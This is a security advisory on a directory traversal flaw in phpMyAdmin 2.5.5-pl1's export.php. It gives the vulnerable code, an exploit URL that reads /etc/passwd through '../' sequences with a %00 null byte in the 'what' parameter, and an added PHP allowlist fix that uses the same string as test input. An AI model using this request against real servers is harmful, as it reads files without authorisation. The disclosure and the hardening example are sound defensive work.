netVigilance Security Advisory 4
Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior
Description:
Directory traversal vulnerability in export.php in phpMyAdmin 2.5.5
and earlier allows remote attackers to read arbitrary files via ..
(dot dot) sequences in the what parameter.
External References:
Mitre CVE:
CAN-2004-0129
BUGTRAQ:
20040203 Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior
BUGTRAQ ID (bid):
9564
Summary:
phpMyAdmin is a tool written in PHP intended to handle the administration of
MySQL over the WWW. There is a vulnerability in the current stable version
of phpMyAdmin that allows an attacker to retrieve arbitrary files from
the webserver with the privileges of the webserver.
Release Date:
February 03 2004
Severity:
High
SecureScout Testcase ID:
TC 17869 (released Feb 6th)
Vulnerable Systems:
phpMyAdmin 2.5.5-pl1 and prior
Vulnerability Type:
Directory traversal: allows the attacker to read any file on the
target server via .. (dot dot) sequences.
Vendor Status:
The vendor has been notified and has released version 2.5.6-rc1, which fixes
the problem.
Example:
Arbitrary File Disclosure
File impacted : export.php
// What type of export are we doing?
if ($what == 'excel') {
    $type = 'csv';
} else {
    $type = $what;
}

/**
 * Defines the url to return to in case of error in a sql statement
 */
require('./libraries/export/' . $type . '.php');
Exploit example:
-- HTTP Request --
http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
-- HTTP Request --
The vulnerability is exploitable even if PHP register_globals is set to
off.
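Hardened handling of the what parameter, shown as an added example: this is not code from the advisory and not the vendor's 2.5.6-rc1 fix. The function name resolve_export_plugin, the allowlist contents and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example, not phpMyAdmin code. Function name and allowlist are assumptions.

/** Map the request's "what" value to a plugin file path, or null if rejected. */
function resolve_export_plugin(string $what, string $pluginDir, array $allowed): ?string
{
    // Same alias the advisory's excerpt applies.
    $type = ($what === 'excel') ? 'csv' : $what;

    // 1. Allowlist with strict comparison: "..", "/" and NUL bytes never match.
    if (!in_array($type, $allowed, true)) {
        return null;
    }

    // 2. Defence in depth: the resolved file must sit directly inside $pluginDir.
    $base = realpath($pluginDir);
    $path = realpath($pluginDir . '/' . $type . '.php');
    if ($base === false || $path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway plugin directory with two stub plugins.
$dir = sys_get_temp_dir() . '/export_demo_' . getmypid();
mkdir($dir);
foreach (['csv', 'sql'] as $t) {
    file_put_contents("$dir/$t.php", "<?php // stub plugin\n");
}

// Constructed inputs; the third is the advisory's request value with %00 decoded.
$inputs = ['csv', 'excel', "../../../../../../etc/passwd\0", 'xml'];
foreach ($inputs as $in) {
    $p = resolve_export_plugin($in, $dir, ['csv', 'sql']);
    $shown = json_encode($in, JSON_UNESCAPED_SLASHES);
    printf("%-45s => %s\n", $shown, $p === null ? 'rejected' : basename($p));
}

// Clean up the demo directory.
array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```

A caller passes only a non-null result to require and answers any rejected value with an error instead of falling back to a default path.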
Credits:
Cedric Cochin - netVigilance Vulnerability Research team